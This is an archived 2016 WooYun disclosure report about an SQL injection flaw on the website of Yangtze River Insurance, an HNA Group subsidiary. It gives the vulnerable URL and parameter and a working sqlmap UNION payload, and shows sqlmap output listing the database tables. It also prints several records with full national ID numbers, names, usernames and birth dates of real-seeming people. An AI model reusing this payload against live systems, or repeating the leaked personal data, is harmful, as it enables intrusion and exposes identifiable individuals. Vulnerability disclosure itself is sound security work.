乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-18: 细节已通知厂商并且等待厂商处理中 2016-04-18: 厂商已经确认,细节仅向厂商公开 2016-04-28: 细节向核心白帽子及相关领域专家公开 2016-05-08: 细节向普通白帽子公开 2016-05-18: 细节向实习白帽子公开 2016-06-02: 细节向公众公开
海航集团旗下扬子江保险主站存在SQL注入漏洞(10万保险经纪资料)
网站http://www.yrib.com/注入点http://www.yrib.com/richsafe_getNewsDetailById.action?id=10
证明
---Parameter: id (GET) Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: id=10' UNION ALL SELECT NULL,CONCAT(0x7170717671,0x5061765a76757a6e5275,0x716b716b71),NULL,NULL#---[10:34:39] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5[10:34:39] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables[10:34:39] [INFO] fetching tables for database: 'richsafe'Database: richsafe+-------------------------+---------+| Table | Entries |+-------------------------+---------+| tbl_faagent | 105693 || tbl_faagentpost | 49359 || tbl_fdcom | 30563 || tbl_fdsyslog | 4329 || tbl_interfacelog | 2705 || tbl_interfacelogparas | 2705 || tbl_fdcounty | 2589 || tbl_occupationcode | 971 || tbl_fadistribution | 889 || tbl_flemployerins_track | 698 || tbl_fmcalmodepams | 666 || ldcode | 455 || tbl_fxinpersonins | 391 || tbl_fcinsured | 346 || tbl_fdcity | 340 || tbl_foorderdetail | 335 || tbl_fouserorder | 335 || tbl_fcappnt | 327 || tbl_fccont | 327 || tbl_fcpol | 312 || tbl_fcprojectplan | 258 || tbl_message | 257 || tbl_fcconttoplan | 256 || tbl_fdmenugrptomenu | 156 || tbl_easypaytype | 154 || tbl_fofxotoattach | 151 || tbl_dxsendrecord | 138 || tbl_fdmenu | 123 || tbl_fxmedicalapp_sf | 80 || tbl_easypayoinfo | 58 || tbl_fdplan | 58 || tbl_fduserlog | 49 || tbl_fdplantopro | 48 || ldmenu | 46 || tbl_fdplanrisk | 46 || seqmysql | 44 || tbl_fmsupplier | 40 || tbl_fdroletomenugrp | 39 || tbl_fmproductplan | 39 || tbl_fdmenugrp | 36 || tbl_fmcalmode | 35 || tbl_fdpriovince | 31 || ldtaskrunlog | 28 || tbl_dxlabelmgt | 28 || tbl_roadrescue | 21 || tbl_uploadinfo | 21 || ldtaskplanaudit | 18 || lduser | 16 || ldtaskaudit | 14 || tbl_fmriskapp | 14 || latestinformation | 11 || tbl_fxmedicalapp_jb_sf | 10 || tbl_lwuser | 10 || tbl_lp_attch | 9 || tbl_commentinfo | 7 || tbl_dxmoduleconfig | 7 || tbl_interfaceinfo | 7 || tbl_interfaceinfoparas | 7 || ldtask | 5 || ldtaskplan | 5 || tbl_fduser | 5 || companyglory | 4 || tbl_fdhrcom | 4 || tbl_fmproductdef | 3 || tbl_ldrole | 3 || `dual` | 2 || recruitmentinformation | 2 || tbl_fiaccpass | 2 || tbl_ficustomeracc | 1 |+-------------------------+---------+
| 110105196501140037 | NULL | NULL | 1000000014 | 1 | 胡杰 | NULL | 1 | NULL | NULL | NULL | NULL | 11444 | hujie | 2014-03-04 | 1965-01-14 | NULL | 001 | 17:29:03 | NULL | NULL | NULL | NULL | 2014-05-29 | 2000-12-26 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 16591 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL || 110102194412022719 | NULL | NULL | 1000000016 | 1 | 王东辉 | NULL | 1 | NULL | NULL | NULL | NULL | 177 | dhui_wang | 2014-03-04 | 1944-12-02 | NULL | 001 | 13:38:14 | NULL | NULL | NULL | NULL | 2014-05-29 | 2001-06-04 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 2 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL || 110105196203067716 | NULL | NULL | 1000000018 | 1 | 郭海涌 | NULL | 1 | NULL | NULL | NULL | NULL | 12000 | hy_guo | 2014-03-04 | 1962-03-06 | NULL | 001 | 13:18:50 | NULL | NULL | NULL | NULL | 2014-05-29 | 1995-03-30 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 9 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL || 11010119640701053x | NULL | NULL | 1000000019 | 1 | 房丽民 | NULL | 1 | NULL | NULL | NULL | NULL | 6277 | lm_fang | 2014-03-04 | 1964-07-01 | NULL | 001 | 11:47:16 | NULL | NULL | NULL | NULL | 2014-08-11 | 1995-04-01 | NULL | NULL | 16:09:29 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 6222 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL || 12011019550814037X | NULL | NULL | 1000000023 | 1 | 孟庆贵 | NULL | 1 | NULL | NULL | NULL | NULL | 11759 | qg_meng | 2014-03-04 | 1955-08-14 | NULL | 001 | 15:14:52 | NULL | NULL | NULL | NULL | 2014-05-29 | 1999-11-26 | NULL | NULL | 15:44:26 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 11683 | NULL | NULL | NULL
过滤
危害等级:高
漏洞Rank:12
确认时间:2016-04-18 14:28
谢谢,我们会立即安排整改。
暂无